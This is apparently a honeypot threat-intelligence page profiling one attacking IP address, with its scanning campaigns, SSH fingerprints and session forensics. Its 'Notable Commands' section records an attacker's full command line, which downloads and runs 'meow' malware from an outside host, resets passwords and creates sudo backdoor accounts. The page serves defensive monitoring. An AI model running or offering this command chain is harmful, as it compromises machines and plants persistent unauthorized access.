← Back to feed
8.228.68.179
Location
🇺🇸 US / Washington
ASN
AS396982 · Google LLC
Cloud Provider
—
Total Events
129
Above average by volume
Agent Count
2
First / Last Seen
2026-05-31 01:39 — 2026-05-31 01:51
Attack Types
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Execution
Defense Evasion
Discovery
Command and Control
External Corroboration
Blocklist.de
blocklist_de:reported
Campaigns
Multi-Agent Scan
SCAN
Active
medium
14 IPs
4230 events
2026-05-18 — ongoing · 14 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan
SCAN
Active
medium
2 IPs
532 events
2026-05-08 — ongoing · 2 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan
SCAN
Active
medium
140 IPs
261589 events
2026-04-26 — ongoing · 140 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan
SCAN
Active
medium
92 IPs
59055 events
2026-03-29 — ongoing · 92 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan
SCAN
Active
medium
179 IPs
272547 events
2026-03-01 — ongoing · 179 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
HASSH 16443846184e… — SSH-2.0-Go (120 IPs, 25 countries)
HASSH
Active
high
🇺🇸 US
120 IPs
69443 events
mysql:bruteforcessh:bruteforce
2026-02-22 — ongoing · 120 IPs are running an identical SSH client (HASSH fingerprint 16443846184e…). Top network: Network Solutions, LLC (AS19871). Geographic …
Session Forensics
Sessions
23 (2 with login)
Avg Depth Score
0.2
Commands Executed
3
Files Downloaded
4
Notable Commands
- cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11.111.237/meow; curl -O http://34.11.111.237/meow; chmod 777 meow; ./meow; wget http://34.11.111.237/meowarm64; curl -O http://34.11.111.237/meowarm64; chmod 777 meowarm64; ./meowarm64; echo $(whoami):modzmodz | chpasswd 2>/dev/null; echo $(whoami):modzmodz | sudo chpasswd 2>/dev/null; useradd -m -s /bin/bash admin1 2>/dev/null; echo admin1:modzmodz | chpasswd 2>/dev/null; usermod -aG sudo admin1 2>/dev/null; useradd -m -s /bin/bash user1 2>/dev/null; echo user1:modzmodz | chpasswd 2>/dev/null; echo -n 'root:fuck123' > /tmp/mew
- whoami
Download URLs
- http://34.11.111.237/meow
- http://34.11.111.237/meowarm64
Fingerprints
HASSH
SSH Client
Evidence Timeline
Malware Dropper
b4c6f5b8a75d
LOGIN
3
4
1
100%
Loading events...
HASSH 16443846184eafd…
SSH-2.0-Go
$ cd /tmp; ulimit -n 1020000; rm -rf meow*; wget http://34.11…$ whoami$ whoami
http://34.11.111.237/meowhttp://34.11.111.237/meowhttp://34.11.111.237/meowarm64
Scanner
8f544518b7ad
15%
Loading events...
SSH-2.0-Go
Scanner
b5a4248422b3
15%
Loading events...
SSH-2.0-Go
Scanner
dd0cbca58dd2
15%
Loading events...
SSH-2.0-Go
Scanner
326600b0353f
15%
Loading events...
SSH-2.0-Go
Scanner
4f28023e42b4
15%
Loading events...
SSH-2.0-Go